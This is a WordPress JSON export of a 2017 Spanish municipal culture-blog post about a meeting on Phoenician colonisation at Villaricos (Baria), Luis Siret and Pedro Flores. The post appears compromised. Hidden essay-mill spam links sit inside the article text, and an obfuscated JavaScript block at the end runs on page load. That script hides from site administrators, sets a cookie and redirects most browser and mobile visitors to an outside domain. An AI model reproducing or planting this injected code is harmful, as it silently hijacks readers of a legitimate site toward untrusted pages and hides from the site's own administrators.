{"id":3056,"date":"2017-09-15T11:53:54","date_gmt":"2017-09-15T11:53:54","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3056"},"modified":"2018-01-15T10:34:47","modified_gmt":"2018-01-15T10:34:47","slug":"iii-encuentros-hablando-con-siret","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2017\/09\/15\/iii-encuentros-hablando-con-siret\/","title":{"rendered":"III ENCUENTROS \u201cHABLANDO CON SIRET\u201d."},"content":{"rendered":"<p class=\"western\" lang=\"es-ES\"><b>VILLARICOS (BARIA) Y LAS PRIMERAS COLONIZACIONES FENICIAS<\/b><\/p>\n<p lang=\"es-ES\"><!--more--><\/p>\n<p><a style=\"text-decoration: none;color: #333\" href=\"https:\/\/sigmaessays.com\/wp-content\/uploads\/2017\/04\/perfect-lab-report-example.pdf\">how to write a lab report example<\/a> Encuentro Hablando con Siret celebrados 26 de agosto en la iglesia de las Herrer\u00edas y aprovechando que en el pasado mes de abril Cuevas del Almanzora se ha adherido a la Red de la Ruta de Los Fenicios, uno de los itinerarios culturales m\u00e1s acreditados para el turismo arqueol\u00f3gico, Ruta avalada por la Uni\u00f3n Europea y el Centro Unesco de Italia, se ha querido homenajear la labor de Siret en cuanto a su pionera l\u00ednea de investigaci\u00f3n que llev\u00f3 a cabo sobre el mundo de las colonizaciones, que ya trat\u00f3 con cautela.<\/p>\n<p class=\"western\" lang=\"es-ES\">Este convenio de colaboraci\u00f3n llevado a cabo entre el ayuntamiento y Arturo Ruiz, director del Centro Andaluz de Arqueolog\u00eda Ib\u00e9rica, responsable de la Ruta en Espa\u00f1a, va a suponer establecer unos compromisos de investigaci\u00f3n y puesta en valor del yacimiento como primera fundaci\u00f3n fenicia de Baria en Villaricos, y, sobre todo de la musealizaci\u00f3n de la importante necr\u00f3polis de hipogeos, donde de los cinco enterramientos conservados se podr\u00edan considerar notables dentro del resto de otros quince que hay en toda Espa\u00f1a.<\/p>\n<p class=\"western\" lang=\"es-ES\">La importancia de este enclave arqueol\u00f3gico es relevante para la Historia de las primeras colonizaciones en esta comarca que las fuentes antiguas sit\u00faan dentro del territorio de los bastetanos del SE peninsular (sigos III y II a.C.) cuyo principal asentamiento en la regi\u00f3n se encontraba en la ciudad de Basti (Baza).<\/p>\n<p class=\"western\" lang=\"es-ES\">Seg\u00fan Estrab\u00f3n, cuando <a style=\"text-decoration: none;color: #333\" href=\"https:\/\/thehomeworkportal.com\/\">thehomeworkportal.com<\/a> llegaron los fenicios se fusionaron con los iberos, fundando la colonia de Baria, en una posici\u00f3n estrat\u00e9gica del estuario del r\u00edo Almanzora, ya que contaba, no s\u00f3lo con amplios recursos pesqueros (almadrabas para capturar at\u00fan, producci\u00f3n de tintes de mures, etc.; de comunicaci\u00f3n con las poblaciones ind\u00edgenas del interior, as\u00ed como mineros en la sierra y en otros puntos de la comarca: plata, plomo, hierro e incluso cobre) y contando con una ensenada para refugio de embarcaciones que dar\u00eda lugar a una importante ciudad comercial portuaria.<\/p>\n<p class=\"western\"><span lang=\"es-ES\">Una ciudad que tuvo su protagonismo durante las Guerras P\u00fanicas entre cartagineses y romanos, Al ser zona de influencia de Am\u00edlcar Barca y de su hijo An\u00edbal por el control de los \u201c<\/span><span lang=\"es-ES\"><i>putei annibalis<\/i><\/span><span lang=\"es-ES\">\u201d: los pozos de plata, y citada por varios autores cl\u00e1sicos como Ptolomeo, Plinio y Estrab\u00f3n.<\/span><\/p>\n<p class=\"western\"><span lang=\"es-ES\">De los importantes indicios arqueol\u00f3gicos ya dan cuenta las antiguas excavaciones arqueol\u00f3gicas llevadas a cabo a lo largo de varias d\u00e9cadas del siglo XX, desde las primeras de Siret; siendo las \u00faltimas intervenciones arqueol\u00f3gicas sobre el tema fenop\u00fanico las realizadas por el arque\u00f3logo Jos\u00e9 Luis L\u00f3pez Castro, profesor de la UAL, que realiza varias campa\u00f1as arqueol\u00f3gicas de urgencia en Villaricos (aparte de las de Abdera en Adra), desde 1987 hasta 1993 y las m\u00e1s recientes en 2003 con la codirecci\u00f3n del arque\u00f3logo Domingo Ortiz, donde se han hallado referencias al primer asentamiento fenicio en la playa y al asedio que sufri\u00f3 Baria en el a\u00f1o 209 a.C. por las legiones de P Cornelio Escipi\u00f3n, lo que provocar\u00eda que la Baria fenicia fuese sometida a Roma como <\/span><span lang=\"es-ES\"><i>civitas stipendiaria<\/i><\/span><span lang=\"es-ES\">, lo que la obligaba a pagar un tributo anual y los recursos pasaban a formar parte del Imperio.<\/span><\/p>\n<p class=\"western\" lang=\"es-ES\">Pero, para hablar del mundo de las colonizaciones fenicias en las costas de Iberia qu\u00e9 mejor experto en la materia que el catedr\u00e1tico em\u00e9rito de la universidad de Sevilla, Oswaldo Arteaga que ha trabajado sobre el mundo fenicio desde mediados de los a\u00f1os setenta del pasado siglo, en m\u00faltiples yacimientos arqueol\u00f3gicos y en nuestra comarca, all\u00e1 por 1975 (cuando nos conocimos en un curso de arqueolog\u00eda en la Palaiapolis de la ciudad grecorromana de Ampurias, primer asentamiento focense de las primeras colonizaciones griegas), en que iniciamos conjuntamente una andadura de prospecciones arqueol\u00f3gicas en nuestra comarca del Levante almeriense, redescubriendo de nuevo los yacimientos siretianos y algunos m\u00e1s como el Pajarraco y Pago de San Ant\u00f3n de Vera, y cuyas prospecciones dieron lugar a plantear el inicio de las excavaciones arqueol\u00f3gicas en Fuente \u00c1lamo con el Dr. Schubart, director del Instituto Arqueol\u00f3gico Alem\u00e1n en la sede de Madrid y el mismo Oswaldo Arteaga que dispon\u00eda de los permisos pertinentes de excavaciones arqueol\u00f3gicas.<\/p>\n<p class=\"western\" lang=\"es-ES\">El doctor Arteaga en un incansable arque\u00f3logo desde sus inicios, desarrollando m\u00faltiples actividades arqueol\u00f3gicas que han dejado huella imborrable en la Arqueolog\u00eda de nuestro pa\u00eds. Catedr\u00e1tico Em\u00e9rito de Prehistoria de la Universidad de Sevilla, en la que tambi\u00e9n fue director del Dpto. de Prehistoria y Arqueolog\u00eda entre 1992 y 2005, desarrollando docencia en otras universidades y centros como C\u00e1diz, Granada, Aut\u00f3noma de Madrid, Salamanca, Valencia, Escuela Nacional de Antropolog\u00eda e Historia de M\u00e9jico, en la Universidad de Oriente (Cuman\u00e1, Venezuela, de donde es originario); miembro correspondiente del Instituto Arqueol\u00f3gico Alem\u00e1n de Berl\u00edn tambi\u00e9n conllev\u00f3 direcci\u00f3n de proyectos de investigaci\u00f3n con el Ministerio de Cultura de Madrid, Junta de Andaluc\u00eda, y, entre otros, destacan proyectos relacionados con el mundo fenicio como Torre del Mar, Saladares, Tossal del Moro, Pe\u00f1\u00f3n de Salobre\u00f1a, Proyecto Fenicio P\u00fanico de la Axarqu\u00eda de V\u00e9lez M\u00e1laga, Iliturgi, etc.; reconstrucci\u00f3n del proceso hist\u00f3rico en el territorio de la ciudad iberorromana de Obulco (Proyecto Porcuna), as\u00ed como proyectos interdisciplinares de Geoarqueolog\u00eda Dial\u00e9ctica: costas andaluzas en la antig\u00fcedad.<\/p>\n<p class=\"western\" lang=\"es-ES\">Tambi\u00e9n llev\u00f3 a cabo la direcci\u00f3n de m\u00faltiples reuniones cient\u00edficas, entre otras el Congreso Internacional en Homenaje a Lu\u00eds Siret, en Cuevas del Almazora en 1984 y participaci\u00f3n en numerosos comit\u00e9s cient\u00edficos, e igualmente estuvo en Estancias de Investigaci\u00f3n entre otras en el Centro de Investigaci\u00f3n del DAI (Instituto Arqueol\u00f3gico Alem\u00e1n) en Cartago (T\u00fanez), etc.<\/p>\n<p class=\"western\" lang=\"es-ES\">As\u00ed pues, el Dr. Arteaga ha venido llevando a cabo varias l\u00edneas de investigaci\u00f3n cuyos estudios abarcan desde los tiempos calcol\u00edticos prehist\u00f3ricos hasta la Edad del Bronce, y, c\u00f3mo no, estudiando la Cultura Arg\u00e1rica, pero tambi\u00e9n por los tiempos protohist\u00f3ricos relativos a las sociedades fenicias y tartesias, iberas y p\u00fanicas hasta la \u00e9poca romana.<\/p>\n<p lang=\"es-ES\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Presentaci\u00f3n-de-las-Jornadas-\u201cHablando-con-Siret\u201d.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-3060\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Presentaci\u00f3n-de-las-Jornadas-\u201cHablando-con-Siret\u201d.jpg\" alt=\"\" width=\"623\" height=\"416\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><span lang=\"es-ES\">Presentaci\u00f3n de las Jornadas \u201c<\/span><\/span><span style=\"font-size: small\"><span lang=\"es-ES\"><i>Hablando con Siret<\/i><\/span><\/span><span style=\"font-size: small\"><span lang=\"es-ES\">\u201d<\/span><\/span><\/p>\n<p class=\"western\"><span lang=\"es-ES\">Oswaldo ha sido amigo y maestro que nos trasmit\u00eda sus excepcionales dotes y experiencias y es uno de los grandes historiadores que desde finales de los a\u00f1os 70 ha creado escuela. Y, a\u00fan jubilado como catedr\u00e1tico em\u00e9rito sigue dirigiendo tesis doctorales y asesorando a quien se lo solicita, de una manera vocacional, dedicaci\u00f3n que le agradecemos en acudir a nuestra llamada para impartir la magistral conferencia en estos III Encuentros \u201c<\/span><span lang=\"es-ES\"><i>Hablando con Siret<\/i><\/span><span lang=\"es-ES\">\u201d: \u201c<\/span><span lang=\"es-ES\"><i>Los antecedentes ind\u00edgenas y la colonizaci\u00f3n fenicia en el paleoestuario del r\u00edo almanzora<\/i><\/span><span lang=\"es-ES\">\u201d.<\/span><\/p>\n<p class=\"western\">En la conferencia que imparti\u00f3 el doctor Oswaldo Arteaga y la Dra. Anna Maria Roos, participaron el alcalde de Cuevas de Almanzora, Sr. Antonio Fern\u00e1ndez Liria, el concejal de cultura, Sr. Indalecio Modesto, el arquitecto, Sr. Juli\u00e1n P\u00e9rez Flores biznieto de Pedro Flores, y el etnoarque\u00f3logo, Sr. Domingo Ortiz. Gustosamente cumplimos con nuestro deber de agradecer profundamente a todos los que durante a\u00f1os participaron en las excavaciones y estudios anal\u00edticos posteriores de los arque\u00f3logos que intervinieron como Lu\u00eds Siret y Cels, que en esta jornada recordamos con admiraci\u00f3n y reconocimiento, y tambi\u00e9n de manera muy especial agradecemos la presencia de la Doctora-arque\u00f3loga alemana Anna Maria Roos y del catedr\u00e1tico Doctor Oswaldo Arteaga Matute, grandes conocedores de nuestro territorio por su dilatada presencia en nuestros yacimientos desde 1977, y sus nueve campa\u00f1as de excavaciones en Fuente \u00c1lamo entre otros. Podr\u00edamos extendernos durante explic\u00e1ndoles excelencia de sus trayectorias profesionales, entre los que se encuentran libros, art\u00edculos y publicaciones as\u00ed como ponencias presentadas a congresos nacionales e internacionales, cursos, seminarios y conferencia impartidas,<\/p>\n<p class=\"western\">Se dio paso a los conferenciantes que expusieron sus trabajos cient\u00edficos y l\u00edneas de investigaci\u00f3n llevadas a cabo. El catedr\u00e1tico. Arteaga y la Doctora Sra. Ana M\u00aa Roos basaron su exposici\u00f3n en los antecedentes ind\u00edgenas y la colonizaci\u00f3n fenicia en el paleoestuario del r\u00edo Almanzora:<\/p>\n<p class=\"western\">En el valle del r\u00edo Almanzora la poblaci\u00f3n aut\u00f3ctona de tradici\u00f3n post-arg\u00e1rica era conocedora de una vieja organizaci\u00f3n estatal como han puesto de manifiesto las investigaciones de Fuente \u00c1lamo. Partiendo del conocimiento de los antecedentes post-arg\u00e1ricos y pre-tartessos que en la actual Andaluc\u00eda se refieren a un bronce Tard\u00edo articulado con el comercio mar\u00edtimo del mundo mic\u00e9nico, el posterior Bronce Final incluye la presencia de los fenicios con la fundaci\u00f3n de Gadir, se asentaron en la costa atl\u00e1ntica, ocupando tambi\u00e9n en el Mediterr\u00e1neo otros puertos como el localizado en el entorno de Villaricos. Este largo proceso hist\u00f3rico explica el origen de las Ciudades-Estado como Baria se implicaron siglos m\u00e1s tarde en la contienda que los romanos y cartagineses desplegaron en el medio d\u00eda peninsular.<\/p>\n<p class=\"western\">Realz\u00f3 el trabajo cient\u00edfico que realiz\u00f3 el Ingeniero de Minas y arque\u00f3logo Sr. Lu\u00eds Siret por su inmensa labor que llevo a cabo en el Sureste peninsular y espec\u00edficamente en el Bajo Almanzora y Cuenca de Vera. Tambi\u00e9n record\u00f3 el trabajo de su colaborador y hombre de confianza Pedro Flores, que naci\u00f3 en Antas y que durante 50 a\u00f1os estuvo a su lado y excav\u00f3 las primeras 46 sepulturas del yacimiento de Fuente \u00c1lamo y de casi la totalidad de 1842 sepulturas de Villaricos, as\u00ed como las 1036 del yacimiento ep\u00f3nico de El Argar en Antas.<\/p>\n<p class=\"western\">Siret y Pedro Flores excavaron e investigaron casi 500 yacimientos que est\u00e1n recogidos en la colecci\u00f3n Siret, entre dicha documentaci\u00f3n se encuentran los 170 cuadernos de campo de Pedro Flores que se encuentran en el MAN (Museo Arqueol\u00f3gico Nacional de Madrid) y se considera \u201cque hizo producci\u00f3n\u201d cient\u00edfica. Juli\u00e1n P\u00e9rez Flores coment\u00f3, que desde su posici\u00f3n de presidente de la Asociaci\u00f3n Amigos de El Argar (AAA), \u201c<i>decir que aunque a veces la labor que me ocupa desde hace a\u00f1os de manera altruista y desde el coraz\u00f3n por la herencia geneal\u00f3gica que me une a esta tierra a la que tanto estimo. El reto de conseguir que el rico patrimonio arqueol\u00f3gico del que es depositaria esta tierra del sureste peninsular sea reconocida y tratada con el respeto que se merece, no olvidemos que los yacimientos no es una herencia de nuestros padres, sino un pr\u00e9stamo de nuestros hijos, y ellos necesitan de protecci\u00f3n y puesta en valor y preservar el patrimonio arqueol\u00f3gico y cultura de esta nuestra tierra<\/i>\u201d.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/caratula-AAA.jpg\"><img decoding=\"async\" class=\"size-full wp-image-3057 aligncenter\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/caratula-AAA.jpg\" alt=\"\" width=\"282\" height=\"378\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"font-family: Century Gothic,sans-serif\"><span style=\"font-size: small\"><i>EDIFICIO MUSEO PEDRO FLORES<\/i><\/span><\/span><\/p>\n<p align=\"center\"><span style=\"font-family: Century Gothic,sans-serif\"><span style=\"font-size: small\">C\/ Arrieros, n\u00fam. 2, Antas &#8211; 04628 (Almer\u00eda)<\/span><\/span><\/p>\n<p align=\"center\"><span style=\"font-family: Century Gothic,sans-serif\"><span style=\"font-size: small\">asociacionamigosdelargar@gmail.com<\/span><\/span><\/p>\n<p class=\"western\">As\u00ed mismo este investigador ya particip\u00f3 en unas Jornadas en Vera en noviembre de 2015, con el tema coet\u00e1neo parte de una de sus muchas l\u00edneas de investigaci\u00f3n, que radica en la aplicaci\u00f3n de la Geoarqueolog\u00eda como una ciencia interdisciplinar abocada en el estudio de las transformaciones paleoambientales y alteraciones ecol\u00f3gicas ocurridas en las costas atl\u00e1nticas-mediterr\u00e1neas de Andaluc\u00eda durante todo el Holoceno.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Jornadas-de-estudio-sobre-el-Argar-celebradas-en-Vera.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-3059\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Jornadas-de-estudio-sobre-el-Argar-celebradas-en-Vera.jpg\" alt=\"\" width=\"368\" height=\"519\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><span lang=\"es-ES\"><i>Jornadas de estudio sobre el Argar celebradas en Vera<\/i><\/span><\/span><\/p>\n<p align=\"center\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Domingo-Ortiz-2012.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-3035 alignright\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Domingo-Ortiz-2012.jpg\" alt=\"\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p class=\"western\" lang=\"es-ES\" align=\"right\"><span style=\"font-size: small\">Domingo Ortiz Soler<\/span><\/p>\n<p class=\"western\" align=\"right\"><span style=\"font-size: small\"><span lang=\"es-ES\">Etnoarque\u00f3logo y Juli\u00e1n P\u00e9rez Flores, arquitecto,<\/span><\/span><\/p>\n<p class=\"western\" lang=\"es-ES\" align=\"right\"><span style=\"font-size: small\">biznieto del capataz de Siret Pedro Flores<\/span><\/p>\n<p class=\"western\" lang=\"es-ES\" align=\"right\"><span style=\"font-size: small\">Coordinadores<\/span><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>VILLARICOS (BARIA) Y LAS PRIMERAS COLONIZACIONES FENICIAS<\/p>\n","protected":false},"author":7,"featured_media":3058,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,4],"tags":[116,268],"class_list":["post-3056","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-museo","tag-arqueologia","tag-s-xix"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3056"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3056\/revisions"}],"predecessor-version":[{"id":3418,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3056\/revisions\/3418"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3058"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}